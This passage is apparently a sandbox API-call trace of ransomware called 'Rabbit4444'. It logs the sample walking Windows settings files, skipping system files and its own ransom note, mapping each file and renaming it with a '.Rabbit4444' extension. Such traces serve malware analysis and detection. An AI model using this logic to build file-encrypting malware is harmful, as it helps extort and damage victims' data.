HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1095a0 | out: hHeap=0xe0000) returned 1 [0057.803] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.803] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109488 | out: hHeap=0xe0000) returned 1 [0057.803] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14911405502) returned 1 [0057.803] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117ab8 | out: hHeap=0xe0000) returned 1 [0057.803] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101d98 | out: hHeap=0xe0000) returned 1 [0057.803] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.804] CloseHandle (hObject=0x298) returned 1 [0057.804] CloseHandle (hObject=0x278) returned 1 [0057.804] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_ProcessorStatus.settingcontent-ms.Rabbit4444") returned 189 [0057.804] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_ProcessorStatus.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_pcsystem_processorstatus.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_ProcessorStatus.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_pcsystem_processorstatus.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.804] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x327587f1, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x327587f1, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x234329b1, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4e4, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_PCSystem_ProductIdStatus.settingcontent-ms", cAlternateFileName="AA94BF~1.SET")) returned 1 [0057.804] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_ProductIdStatus.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.804] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_ProductIdStatus.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.804] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_ProductIdStatus.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.804] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_ProductIdStatus.settingcontent-ms", lpString2=".") returned 1 [0057.804] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_ProductIdStatus.settingcontent-ms", lpString2="..") returned 1 [0057.804] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_ProductIdStatus.settingcontent-ms", lpString2="windows") returned -1 [0057.804] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_ProductIdStatus.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.805] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_ProductIdStatus.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.805] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_ProductIdStatus.settingcontent-ms", lpString2="boot") returned -1 [0057.805] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_ProductIdStatus.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.805] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_ProductIdStatus.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.805] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_PCSystem_ProductIdStatus.settingcontent-ms" | out: lpString1="AAA_SystemSettings_PCSystem_ProductIdStatus.settingcontent-ms") returned="AAA_SystemSettings_PCSystem_ProductIdStatus.settingcontent-ms" [0057.805] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_ProductIdStatus.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.805] lstrlenW (lpString="AAA_SystemSettings_PCSystem_ProductIdStatus.settingcontent-ms") returned 61 [0057.805] lstrlenW (lpString="Rabbit4444") returned 10 [0057.805] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.805] lstrlenW (lpString=".dll") returned 4 [0057.805] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.805] lstrlenW (lpString=".lnk") returned 4 [0057.805] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.805] lstrlenW (lpString=".ini") returned 4 [0057.805] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.805] lstrlenW (lpString=".sys") returned 4 [0057.805] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.805] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_ProductIdStatus.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_pcsystem_productidstatus.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.805] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.805] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14911626994) returned 1 [0057.806] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1252) returned 1 [0057.806] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117c98 [0057.806] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x1020c8 [0057.806] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7f0, lpName=0x0) returned 0x298 [0057.807] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7f0) returned 0x70000 [0057.808] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.808] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x108df8 [0057.808] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.808] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0057.808] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.808] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0057.808] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.808] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x108df8 | out: hHeap=0xe0000) returned 1 [0057.808] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14911883704) returned 1 [0057.808] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117c98 | out: hHeap=0xe0000) returned 1 [0057.808] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1020c8 | out: hHeap=0xe0000) returned 1 [0057.808] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.808] CloseHandle (hObject=0x298) returned 1 [0057.808] CloseHandle (hObject=0x278) returned 1 [0057.808] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_ProductIdStatus.settingcontent-ms.Rabbit4444") returned 189 [0057.808] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_ProductIdStatus.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_pcsystem_productidstatus.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_ProductIdStatus.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_pcsystem_productidstatus.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.809] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x329badf0, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x329badf0, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2394398e, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4c1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_PCSystem_RenamePC.settingcontent-ms", cAlternateFileName="AADA5D~1.SET")) returned 1 [0057.809] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_RenamePC.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.809] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_RenamePC.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.809] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_RenamePC.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.809] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_RenamePC.settingcontent-ms", lpString2=".") returned 1 [0057.809] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_RenamePC.settingcontent-ms", lpString2="..") returned 1 [0057.809] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_RenamePC.settingcontent-ms", lpString2="windows") returned -1 [0057.809] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_RenamePC.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.809] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_RenamePC.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.809] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_RenamePC.settingcontent-ms", lpString2="boot") returned -1 [0057.809] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_RenamePC.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.810] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_RenamePC.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.810] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_PCSystem_RenamePC.settingcontent-ms" | out: lpString1="AAA_SystemSettings_PCSystem_RenamePC.settingcontent-ms") returned="AAA_SystemSettings_PCSystem_RenamePC.settingcontent-ms" [0057.810] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_RenamePC.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.810] lstrlenW (lpString="AAA_SystemSettings_PCSystem_RenamePC.settingcontent-ms") returned 54 [0057.810] lstrlenW (lpString="Rabbit4444") returned 10 [0057.810] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.810] lstrlenW (lpString=".dll") returned 4 [0057.810] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.810] lstrlenW (lpString=".lnk") returned 4 [0057.810] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.810] lstrlenW (lpString=".ini") returned 4 [0057.810] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.810] lstrlenW (lpString=".sys") returned 4 [0057.810] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.810] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_RenamePC.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_pcsystem_renamepc.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.810] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.811] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14912129910) returned 1 [0057.811] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1217) returned 1 [0057.811] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117860 [0057.811] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101848 [0057.811] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7d0, lpName=0x0) returned 0x298 [0057.812] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7d0) returned 0x70000 [0057.813] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.813] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109258 [0057.813] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.813] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1097d0 [0057.813] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.813] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1097d0 | out: hHeap=0xe0000) returned 1 [0057.813] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.813] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109258 | out: hHeap=0xe0000) returned 1 [0057.813] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14912377629) returned 1 [0057.813] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117860 | out: hHeap=0xe0000) returned 1 [0057.813] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101848 | out: hHeap=0xe0000) returned 1 [0057.813] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.813] CloseHandle (hObject=0x298) returned 1 [0057.813] CloseHandle (hObject=0x278) returned 1 [0057.813] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_RenamePC.settingcontent-ms.Rabbit4444") returned 182 [0057.813] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_RenamePC.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_pcsystem_renamepc.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_RenamePC.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_pcsystem_renamepc.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.814] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32a799aa, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x32a799aa, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2340c766, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x4e9, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_PCSystem_SystemTypeStatus.settingcontent-ms", cAlternateFileName="AA9DA3~1.SET")) returned 1 [0057.814] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_SystemTypeStatus.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.814] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_SystemTypeStatus.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.814] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_SystemTypeStatus.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.814] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_SystemTypeStatus.settingcontent-ms", lpString2=".") returned 1 [0057.814] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_SystemTypeStatus.settingcontent-ms", lpString2="..") returned 1 [0057.814] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_SystemTypeStatus.settingcontent-ms", lpString2="windows") returned -1 [0057.814] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_SystemTypeStatus.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.814] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_SystemTypeStatus.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.814] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_SystemTypeStatus.settingcontent-ms", lpString2="boot") returned -1 [0057.814] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_SystemTypeStatus.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.814] lstrcmpiW (lpString1="AAA_SystemSettings_PCSystem_SystemTypeStatus.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.814] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_PCSystem_SystemTypeStatus.settingcontent-ms" | out: lpString1="AAA_SystemSettings_PCSystem_SystemTypeStatus.settingcontent-ms") returned="AAA_SystemSettings_PCSystem_SystemTypeStatus.settingcontent-ms" [0057.815] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_SystemTypeStatus.settingcontent-ms", dwFileAttributes=0x0) returned 1 [0057.815] lstrlenW (lpString="AAA_SystemSettings_PCSystem_SystemTypeStatus.settingcontent-ms") returned 62 [0057.815] lstrlenW (lpString="Rabbit4444") returned 10 [0057.815] lstrcmpiW (lpString1="content-ms", lpString2="Rabbit4444") returned -1 [0057.815] lstrlenW (lpString=".dll") returned 4 [0057.815] lstrcmpiW (lpString1="t-ms", lpString2=".dll") returned 1 [0057.815] lstrlenW (lpString=".lnk") returned 4 [0057.815] lstrcmpiW (lpString1="t-ms", lpString2=".lnk") returned 1 [0057.815] lstrlenW (lpString=".ini") returned 4 [0057.815] lstrcmpiW (lpString1="t-ms", lpString2=".ini") returned 1 [0057.815] lstrlenW (lpString=".sys") returned 4 [0057.815] lstrcmpiW (lpString1="t-ms", lpString2=".sys") returned 1 [0057.815] CreateFileW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_SystemTypeStatus.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_pcsystem_systemtypestatus.settingcontent-ms"), dwDesiredAccess=0xe0003, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000000, hTemplateFile=0x0) returned 0x278 [0057.816] QueryPerformanceFrequency (in: lpFrequency=0x130bfb8 | out: lpFrequency=0x130bfb8*=100000000) returned 1 [0057.816] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc0 | out: lpPerformanceCount=0x130bfc0*=14912634882) returned 1 [0057.816] GetFileSizeEx (in: hFile=0x278, lpFileSize=0x130c018 | out: lpFileSize=0x130c018*=1257) returned 1 [0057.816] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x6c) returned 0x117a40 [0057.816] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x80) returned 0x101c00 [0057.816] CreateFileMappingW (hFile=0x278, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7f0, lpName=0x0) returned 0x298 [0057.817] MapViewOfFile (hFileMappingObject=0x298, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7f0) returned 0x70000 [0057.818] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x100) returned 0x124d90 [0057.818] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x109140 [0057.818] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.818] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x104) returned 0x1096b8 [0057.818] RtlAllocateHeap (HeapHandle=0xe0000, Flags=0x8, Size=0x208) returned 0x124d90 [0057.818] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x1096b8 | out: hHeap=0xe0000) returned 1 [0057.818] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x124d90 | out: hHeap=0xe0000) returned 1 [0057.818] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x109140 | out: hHeap=0xe0000) returned 1 [0057.818] QueryPerformanceCounter (in: lpPerformanceCount=0x130bfc8 | out: lpPerformanceCount=0x130bfc8*=14912892694) returned 1 [0057.818] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x117a40 | out: hHeap=0xe0000) returned 1 [0057.818] HeapFree (in: hHeap=0xe0000, dwFlags=0x0, lpMem=0x101c00 | out: hHeap=0xe0000) returned 1 [0057.818] UnmapViewOfFile (lpBaseAddress=0x70000) returned 1 [0057.818] CloseHandle (hObject=0x298) returned 1 [0057.818] CloseHandle (hObject=0x278) returned 1 [0057.818] wsprintfW (in: param_1=0x130c2c8, param_2="%s.%s" | out: param_1="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_SystemTypeStatus.settingcontent-ms.Rabbit4444") returned 190 [0057.819] MoveFileExW (lpExistingFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_SystemTypeStatus.settingcontent-ms" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_pcsystem_systemtypestatus.settingcontent-ms"), lpNewFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_PCSystem_SystemTypeStatus.settingcontent-ms.Rabbit4444" (normalized: "c:\\users\\fd1hvy\\appdata\\local\\packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\localstate\\indexed\\settings\\en-us\\aaa_systemsettings_pcsystem_systemtypestatus.settingcontent-ms.rabbit4444"), dwFlags=0x1) returned 1 [0057.819] FindNextFileW (in: hFindFile=0x102510, lpFindFileData=0x130dfe8 | out: lpFindFileData=0x130dfe8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x32b12313, ftCreationTime.dwHighDateTime=0x1d32715, ftLastAccessTime.dwLowDateTime=0x32b12313, ftLastAccessTime.dwHighDateTime=0x1d32715, ftLastWriteTime.dwLowDateTime=0x2340c766, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x532, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AAA_SystemSettings_Personalize_Background_ChooseBackground.settingcontent-ms", cAlternateFileName="AAA8A2~1.SET")) returned 1 [0057.819] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_Background_ChooseBackground.settingcontent-ms", lpString2="HOW TO BACK YOUR FILES.txt") returned -1 [0057.820] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_Background_ChooseBackground.settingcontent-ms", lpString2=".BFC0E91B00AE8A0620D3") returned 1 [0057.820] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_Background_ChooseBackground.settingcontent-ms", lpString2="Rabbit4444.exe") returned -1 [0057.820] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_Background_ChooseBackground.settingcontent-ms", lpString2=".") returned 1 [0057.820] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_Background_ChooseBackground.settingcontent-ms", lpString2="..") returned 1 [0057.820] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_Background_ChooseBackground.settingcontent-ms", lpString2="windows") returned -1 [0057.820] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_Background_ChooseBackground.settingcontent-ms", lpString2="bootmgr") returned -1 [0057.820] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_Background_ChooseBackground.settingcontent-ms", lpString2="pagefile.sys") returned -1 [0057.820] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_Background_ChooseBackground.settingcontent-ms", lpString2="boot") returned -1 [0057.820] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_Background_ChooseBackground.settingcontent-ms", lpString2="ids.txt") returned -1 [0057.820] lstrcmpiW (lpString1="AAA_SystemSettings_Personalize_Background_ChooseBackground.settingcontent-ms", lpString2="NTUSER.DAT") returned -1 [0057.820] lstrcpyW (in: lpString1=0x130ec22, lpString2="AAA_SystemSettings_Personalize_Background_ChooseBackground.settingcontent-ms" | out: lpString1="AAA_SystemSettings_Personalize_Background_ChooseBackground.settingcontent-ms") returned="AAA_SystemSettings_Personalize_Background_ChooseBackground.settingcontent-ms" [0057.820] SetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\AppData\\Local\\Packages\\windows.immersivecontrolpanel_cw5n1h2txyewy\\LocalState\\Indexed\\Settings\\en-US\\AAA_SystemSettings_Personalize_Background_ChooseBackground.settingcontent-ms", 